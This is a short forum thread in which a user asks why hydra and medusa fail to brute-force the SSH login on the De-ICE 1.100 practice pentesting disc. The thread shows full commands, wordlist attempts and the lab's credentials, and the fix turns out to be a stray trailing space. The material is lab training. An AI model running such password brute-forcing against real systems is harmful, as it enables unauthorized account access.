Results 1 to 5 of 5

Thread: cracking ssh de-ice.net-1.100-1.1

  1. #1
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default cracking ssh de-ice.net-1.100-1.1

    Hello,
    I am trying to crack the ssh login of the first De-ice pentesting disc.
    The login is "aadams" and the password is "nostradamus". I tried loging in already and it works perfectly. But when I try to crack the ssh password, it doesn't work. I tried with both hydra and medusa and ofcourse the password is in the dictionary file.
    (another login:bbanter and password:bbanter hydra was able to crack)

    Code:
    root@bt:~# medusa -h 192.168.1.100 -u aadams -P /root/1.txt -M ssh
    Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
    
    ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (1 of 1, 0 complete) Password: aaaaaa (1 of 8 complete)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (1 of 1, 0 complete) Password: clksn (2 of 8 complete)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (1 of 1, 0 complete) Password: nostradamus  (3 of 8 complete)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (1 of 1, 0 complete) Password: sdcsln (4 of 8 complete)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (1 of 1, 0 complete) Password: cqnsdolc (5 of 8 complete)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (1 of 1, 0 complete) Password: clkdsq  (6 of 8 complete)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (1 of 1, 0 complete) Password: dslknk v (7 of 8 complete)
    ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (1 of 1, 0 complete) Password: vcklsdnn (8 of 8 complete)
    Code:
    root@bt:~# hydra 192.168.1.100 ssh2 -V -l aadams -P /root/1.txt
    Hydra v5.7 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org) starting at 2011-04-17 16:01:14
    [DATA] 9 tasks, 1 servers, 9 login tries (l:1/p:9), ~1 tries per task
    [DATA] attacking service ssh2 on port 22
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "aaaaaa" - child 0 - 1 of 9
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "clksn" - child 1 - 2 of 9
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "nostradamus " - child 2 - 3 of 9
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "sdcsln" - child 3 - 4 of 9
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "cqnsdolc" - child 4 - 5 of 9
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "clkdsq " - child 5 - 6 of 9
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "dslknk v" - child 6 - 7 of 9
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "vcklsdnn" - child 7 - 8 of 9
    [STATUS] attack finished for 192.168.1.100 (waiting for childs to finish)
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "" - child 8 - 9 of 9
    Hydra (http://www.thc.org) finished at 2011-04-17 16:01:15
    Am I missing something ??
    Any help would be appreciated
    Last edited by LHYX1; 04-17-2011 at 02:58 PM.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  2. #2
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: cracking ssh de-ice.net-1.100-1.1

    Crank up your verbosity when you do a standard SSH so that you can see what version of the protocol is used and what auth it used. Then crank up the verbosity in hydra or medusa and make sure it matches.

    Or go over to the de-ice forums and ask since it's their product.

    Or use google, searching "de-ice ssh" will get you step by step instructions in the top 5 results, though pathetically you'll have looked and not learned anything
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  3. #3
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: cracking ssh de-ice.net-1.100-1.1

    Thanx for the reply !
    I solved the problem Apperently there was a space behind "nostradamus".
    Code:
    [ATTEMPT] target 192.168.1.100 - login "aadams" - pass "nostradamus " - child 2 - 3 of 9
    I removed the space and was able to crack the password.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  4. #4
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: cracking ssh de-ice.net-1.100-1.1

    DOH! Don't you hate it when simple things like that cause you to shoot yourself in the foot Grr!
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  5. #5
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: cracking ssh de-ice.net-1.100-1.1

    Yeah, I spent at least 1 hour searching for a solution and then it's a damn space !!!
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

Similar Threads

  1. Replies: 0
    Last Post: 12-30-2010, 12:00 PM
  2. Cracking wpa
    By simeon.mattes in forum OLD Newbie Area
    Replies: 0
    Last Post: 06-28-2009, 02:10 PM
  3. Help cracking wpa
    By alxdg in forum OLD Newbie Area
    Replies: 3
    Last Post: 08-22-2008, 05:27 PM
  4. WEP Cracking
    By Oren1 in forum OLD Newbie Area
    Replies: 16
    Last Post: 07-27-2007, 07:04 PM
  5. Cracking my WPA AP
    By damocles in forum OLD Wireless
    Replies: 21
    Last Post: 07-05-2007, 09:31 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •